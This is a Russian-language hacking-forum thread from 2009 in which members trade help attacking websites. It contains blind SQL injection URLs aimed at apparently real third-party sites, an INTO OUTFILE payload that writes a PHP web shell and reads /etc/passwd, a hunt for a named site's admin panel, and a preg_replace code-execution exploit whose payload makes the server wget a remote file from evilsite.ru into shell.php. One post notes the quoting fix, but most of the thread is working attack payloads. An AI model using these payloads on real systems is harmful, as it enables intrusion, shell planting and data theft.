Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. ElteRUS

    ElteRUS Elder - Старейшина

    Joined:
    11 Oct 2007
    Messages:
    367
    Likes Received:
    460
    Reputations:
    93
    HAXTA4OK, давай ссылку. Для телепатии недостаточно маны

    http://www.edu-play.co.uk/prod-detail.asp?ProductID=4204+and+1=if(ascii(substring((select+table_name+from+information_schema.tables+limit+0,1),1,1))>1,1,0)

    Оно ?
     
  2. HAXTA4OK

    HAXTA4OK Super Moderator
    Staff Member

    Joined:
    15 Mar 2009
    Messages:
    942
    Likes Received:
    817
    Reputations:
    605
    не оно, SQL-inj нашел другую ..так что =) всем спс {/offtop]
     
    _________________________
  3. warlok

    warlok Elder - Старейшина

    Joined:
    17 Feb 2008
    Messages:
    337
    Likes Received:
    142
    Reputations:
    81
    Update - вопрос остался без ответа :(
    Ну не, это немного нето. Небудуж я его каждый раз запускать, палево млин. Мож кто нает как например разрешить конект на определенный порт? ибо например когда пингую говорит что сервер офф а из веба его видно.
     
  4. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,390
    Likes Received:
    1,209
    Reputations:
    475
    warlok, iptables -L
     
  5. warlok

    warlok Elder - Старейшина

    Joined:
    17 Feb 2008
    Messages:
    337
    Likes Received:
    142
    Reputations:
    81
    Code:
    Chain INPUT (policy DROP)
    target     prot opt source               destination         
    ACCEPT     tcp  --  урл сайта   anywhere            tcp flags:!FIN,SYN,RST,ACK/SYN 
    ACCEPT     udp  --  урл сайта   anywhere            
    ACCEPT     tcp  --  урл сайта    anywhere            tcp flags:!FIN,SYN,RST,ACK/SYN 
    ACCEPT     udp  --  урл сайта    anywhere            
    ACCEPT     all  --  anywhere             anywhere            
    ACCEPT     icmp --  anywhere             anywhere            limit: avg 10/sec burst 5 
    DROP       all  --  anywhere             255.255.255.255     
    DROP       all  --  anywhere             198.202.66.255      
    DROP       all  --  base-address.mcast.net/8  anywhere            
    DROP       all  --  anywhere             base-address.mcast.net/8 
    DROP       all  --  255.255.255.255      anywhere            
    DROP       all  --  anywhere             0.0.0.0             
    DROP       all  --  anywhere             anywhere            state INVALID 
    LSI        all  -f  anywhere             anywhere            limit: avg 10/min burst 5 
    INBOUND    all  --  anywhere             anywhere            
    INBOUND    all  --  anywhere             perutz.salk.edu     
    INBOUND    all  --  anywhere             perutz.salk.edu     
    INBOUND    all  --  anywhere             198.202.66.255      
    LOG_FILTER  all  --  anywhere             anywhere            
    LOG        all  --  anywhere             anywhere            LOG level info prefix `Unknown Input' 
    
    Chain FORWARD (policy DROP)
    target     prot opt source               destination         
    ACCEPT     icmp --  anywhere             anywhere            limit: avg 10/sec burst 5 
    TCPMSS     tcp  --  anywhere             anywhere            tcp flags:SYN,RST/SYN TCPMSS clamp to PMTU 
    OUTBOUND   all  --  anywhere             anywhere            
    ACCEPT     tcp  --  anywhere             198.202.66.0/24     state RELATED,ESTABLISHED 
    ACCEPT     udp  --  anywhere             198.202.66.0/24     state RELATED,ESTABLISHED 
    LOG_FILTER  all  --  anywhere             anywhere            
    LOG        all  --  anywhere             anywhere            LOG level info prefix `Unknown Forward' 
    
    Chain OUTPUT (policy DROP)
    target     prot opt source               destination         
    ACCEPT     tcp  --  урл сайта      урл сайта  tcp dpt:domain 
    ACCEPT     udp  --  урл сайта      урл сайта  udp dpt:domain 
    ACCEPT     tcp  --  урл сайта      урл сайта   tcp dpt:domain 
    ACCEPT     udp  --  урл сайта      урл сайта   udp dpt:domain 
    ACCEPT     all  --  anywhere             anywhere            
    DROP       all  --  base-address.mcast.net/8  anywhere            
    DROP       all  --  anywhere             base-address.mcast.net/8 
    DROP       all  --  255.255.255.255      anywhere            
    DROP       all  --  anywhere             0.0.0.0             
    DROP       all  --  anywhere             anywhere            state INVALID 
    OUTBOUND   all  --  anywhere             anywhere            
    OUTBOUND   all  --  anywhere             anywhere            
    LOG_FILTER  all  --  anywhere             anywhere            
    LOG        all  --  anywhere             anywhere            LOG level info prefix `Unknown Output' 
    
    Chain INBOUND (4 references)
    target     prot opt source               destination         
    ACCEPT     tcp  --  anywhere             anywhere            state RELATED,ESTABLISHED 
    ACCEPT     udp  --  anywhere             anywhere            state RELATED,ESTABLISHED 
    ACCEPT     all  --  198.202.66.0/24      anywhere            
    ACCEPT     all  --  198.202.69.0/24      anywhere            
    ACCEPT     all  --  10.0.0.0/8           anywhere            
    ACCEPT     tcp  --  anywhere             anywhere            tcp dpt:smtp 
    ACCEPT     udp  --  anywhere             anywhere            udp dpt:smtp 
    ACCEPT     tcp  --  anywhere             anywhere            tcp dpt:http 
    ACCEPT     udp  --  anywhere             anywhere            udp dpt:http 
    LSI        all  --  anywhere             anywhere            
    
    Chain LOG_FILTER (5 references)
    target     prot opt source               destination         
    
    Chain LSI (2 references)
    target     prot opt source               destination         
    LOG_FILTER  all  --  anywhere             anywhere            
    LOG        tcp  --  anywhere             anywhere            tcp flags:FIN,SYN,RST,ACK/SYN limit: avg 1/sec burst 5 LOG level info prefix `Inbound ' 
    DROP       tcp  --  anywhere             anywhere            tcp flags:FIN,SYN,RST,ACK/SYN 
    LOG        tcp  --  anywhere             anywhere            tcp flags:FIN,SYN,RST,ACK/RST limit: avg 1/sec burst 5 LOG level info prefix `Inbound ' 
    DROP       tcp  --  anywhere             anywhere            tcp flags:FIN,SYN,RST,ACK/RST 
    LOG        icmp --  anywhere             anywhere            icmp echo-request limit: avg 1/sec burst 5 LOG level info prefix `Inbound ' 
    DROP       icmp --  anywhere             anywhere            icmp echo-request 
    LOG        all  --  anywhere             anywhere            limit: avg 5/sec burst 5 LOG level info prefix `Inbound ' 
    DROP       all  --  anywhere             anywhere            
    
    Chain LSO (0 references)
    target     prot opt source               destination         
    LOG_FILTER  all  --  anywhere             anywhere            
    LOG        all  --  anywhere             anywhere            limit: avg 5/sec burst 5 LOG level info prefix `Outbound ' 
    REJECT     all  --  anywhere             anywhere            reject-with icmp-port-unreachable 
    
    Chain OUTBOUND (3 references)
    target     prot opt source               destination         
    ACCEPT     icmp --  anywhere             anywhere            
    ACCEPT     tcp  --  anywhere             anywhere            state RELATED,ESTABLISHED 
    ACCEPT     udp  --  anywhere             anywhere            state RELATED,ESTABLISHED 
    ACCEPT     all  --  anywhere             anywhere            
    
     
    #9065 warlok, 28 Sep 2009
    Last edited: 28 Sep 2009
  6. paypoker

    paypoker New Member

    Joined:
    3 Aug 2009
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    можно ли в mysql в подзапросе записать инфу в файл?
     
  7. warlok

    warlok Elder - Старейшина

    Joined:
    17 Feb 2008
    Messages:
    337
    Likes Received:
    142
    Reputations:
    81
    paypoker можно через into outfile при соответсвующих правах
     
  8. paypoker

    paypoker New Member

    Joined:
    3 Aug 2009
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    http://xxx/xxx?id=48535'/**/and%22x%22/**/regexp/**/concat(%22x{1,25%22,/**/if(substring((SELECT/**/file_priv/**/FROM/**/mysql.user%20WHERE/**/user/**/=/**/'root'),1,1)/**/=/**/'Y',/**/(select/**/1/**/union/**/select/**/2),/**/%226}%22))/**/and/**/1='1


    Subquery returns more than 1 row. т.е. права есть

    Code:
    select product_list.id, product_manufacturers.manname, product_list.manpart, product_list.descr, product_list.upccode, product_list.platform, product_list.sku, product_list.subsku, product_prices.price_msrp, product_prices.price_level1, product_list.refurb, product_list.demo, product_prices.instock, product_list.dropship as dship, product_list.visible from product_list, product_manufacturers, product_prices, site_skus where product_prices.price_level1 > 0 AND product_list.id = '48535'/**/and"x"/**/regexp/**/concat("x{1,25",/**/if(MID((SELECT file_priv FROM mysql.user WHERE user = 'root'),1,1) = 'Y',/**/(select/**/1/**/union/**/select/**/2),/**/"6}")) and 1='1' and product_list.kit = '0' AND product_list.manid = product_manufacturers.manid and site_skus.pid = product_list.id and site_skus.divid = '0' and product_list.id = product_prices.id group by product_list.id
    собственно как? обрубать запрос нельзя обрубалки не работают :)
    нужно сделать через подзапрос
     
    #9068 paypoker, 29 Sep 2009
    Last edited: 29 Sep 2009
  9. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,138
    Reputations:
    350
    paypoker

    проверяем файл прив
    id=1+and+1=(if(load_file('/etc/passwd')+is+not+NULL,1,2))

    заливаем
    id=1+and+if((select+"<?php код ?>"+into+outfile+'/dir/shell.php'),1,2)=1

    обрубалки и фильтры так-же как и в твоём подзапросе обойдёшь, если база старая добавь from

    ну думаю если такую чудо конструкцию сумел составить, разберёшься и под себя переделаешь, это макет :)
     
    1 person likes this.
  10. cupper

    cupper Elder - Старейшина

    Joined:
    6 Jun 2007
    Messages:
    370
    Likes Received:
    92
    Reputations:
    5
    вот якобы скуль
    http://www.bicentenary.tas.gov.au/events/event.php?id=10'
    вызывает ошибку
    вроде вот оно счастье
    определяю количество столбов
    http://www.bicentenary.tas.gov.au/events/event.php?id=10+order+by+20
    работает
    http://www.bicentenary.tas.gov.au/events/event.php?id=10+order+by+21
    выдает ошибку. Столбцов у нас 20 значит.
    Сотмрю
    http://www.bicentenary.tas.gov.au/events/event.php?id=10+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20
    и получаю
    504 ошибку,
    О_о, в чем прикол ?
     
  11. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,138
    Reputations:
    350
    http://www.bicentenary.tas.gov.au/events/event.php?id=10+and+substring(version(),1,1)=3

    rtfm
     
    1 person likes this.
  12. nemaniak

    nemaniak Elder - Старейшина

    Joined:
    10 Jun 2008
    Messages:
    198
    Likes Received:
    161
    Reputations:
    108
    не могу найти админку на http://www.beeliefbotanics.com, всю бошку сломал, помогите кто может, заранее пасиб
     
  13. WNZRS

    WNZRS Member

    Joined:
    3 Sep 2009
    Messages:
    295
    Likes Received:
    53
    Reputations:
    1
    http://www.beeliefbotanics.com/admin.php админка, авторизация где-то в другом месте или через куки, GET
     
  14. nemaniak

    nemaniak Elder - Старейшина

    Joined:
    10 Jun 2008
    Messages:
    198
    Likes Received:
    161
    Reputations:
    108
    ну у меня реакция - пустая страница, тоже самое и при http://www.beeliefbotanics.com/admin1012121.php например...
     
  15. HAXTA4OK

    HAXTA4OK Super Moderator
    Staff Member

    Joined:
    15 Mar 2009
    Messages:
    942
    Likes Received:
    817
    Reputations:
    605
    http://127.0.0.1/4/11.php?get=[1]phpinfo()[/1]

    выводит phpinfo()

    Во нашел


    http://127.0.0.1/4/11.php?get=[1]eval($d)[/1]&d=echo%20'fff';
     
    _________________________
    #9075 HAXTA4OK, 29 Sep 2009
    Last edited: 29 Sep 2009
  16. warlok

    warlok Elder - Старейшина

    Joined:
    17 Feb 2008
    Messages:
    337
    Likes Received:
    142
    Reputations:
    81
    или так http://127.0.0.1/dir.php?get=[1]system(dir)[/1] - у мну все выполняеться
     
    1 person likes this.
  17. HAXTA4OK

    HAXTA4OK Super Moderator
    Staff Member

    Joined:
    15 Mar 2009
    Messages:
    942
    Likes Received:
    817
    Reputations:
    605

    взял твой пример у меня

    http://127.0.0.1/4/11.php?get=[1]echo%20'fff'[/1]

    Parse error: syntax error, unexpected T_ECHO, expecting ')' in C:\xampp\htdocs\4\11.php(3) : regexp code on line 1

    Fatal error: preg_replace() [<a href='function.preg-replace'>function.preg-replace</a>]: Failed evaluating code: base64_encode(echo \'fff\') in C:\xampp\htdocs\4\11.php on line 3

    а при моем на кавычки не ругается :)



    а я ни чего против не имею, что в регулярке нету eval'a ,eval это уже как следствие выполнения php кода, а далее раз ты его выполняеш то и получаеш eval($d)&d=phpcode
     
    _________________________
    #9077 HAXTA4OK, 29 Sep 2009
    Last edited: 29 Sep 2009
    1 person likes this.
  18. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    2,007
    Likes Received:
    996
    Reputations:
    155
    О каком коде вы говорите?... Где исходники?
    upd: Увидел, ща посмотрю...
     
    #9078 mailbrush, 29 Sep 2009
    Last edited: 29 Sep 2009
  19. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    2,007
    Likes Received:
    996
    Reputations:
    155
    Nightmarе, ты посмотри внимательно как ты парсишь текст:
    PHP:
    preg_replace("#\[1\](.*?)\[/1\]#sie""base64_encode(\\1)"$get);
    Если на входе
    Code:
    http://127.0.0.1/1.php?get=[1]phpinfo()[/1]
    то на выходе будет
    Code:
    base64_encode(phpinfo());
    Сначала выполнится phpinfo(); - выведет результат на экран, а потом base64_encode(phpinfo()); выведет MQ==, т.е кодированный в base64 результат ВЫПОЛНЕНИЯ ф-ции phpinfo(), т.е. 1 (1 - ф-ция выполнилась успешно, 0 - нет) . Вся ошибка твоего кода в том, что ты не ставишь кавычек на заменяющую строку. Т.е. вместо
    PHP:
    "base64_encode(\\1)"
    поставь
    PHP:
    "base64_encode('\\1')"
    И твой код будет полностью защищен - выполнить какие-либо php-функции не удастся. Это по поводу безопасности..

    Если же тебе надо, н.п. шелл залить, на вход отправь данные:
    Code:
    ?get=[1]system($_GET[0])[/1]&0=wget+http://evilsite.ru/evilcode.txt+-O+shell.php
    Он сработает. Почему? Интерпретатор будет интерпретировать строку
    PHP:
    base64_encode(system($_GET[0]))
    Сначала выполнится ф-ция system(), которая берет аргумент с GET параметра 0, а он у тебя
    Code:
    wget http://evilsite.ru/evilcode.txt -O shell.php
    Синтаксис wget объяснять не буду...
     
    #9079 mailbrush, 29 Sep 2009
    Last edited: 29 Sep 2009
    6 people like this.
  20. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    2,007
    Likes Received:
    996
    Reputations:
    155
    Нет, тебя в кавычках строка на выходе.
    Code:
    $line = preg_replace("#\[1\](.*?)\[/1\]#sie", "[SIZE=4][COLOR=Red]'[/COLOR][/SIZE]<a href=\"javascript:getfile(\''.addslashes('\\1').'\');\"><font color=#E2C6EE>\\1</font></a>[SIZE=4][COLOR=Red]'[/COLOR][/SIZE]", $line);
    Почему не работает? - Смотри выше.
     
    2 people like this.
Loading...
Thread Status:
Not open for further replies.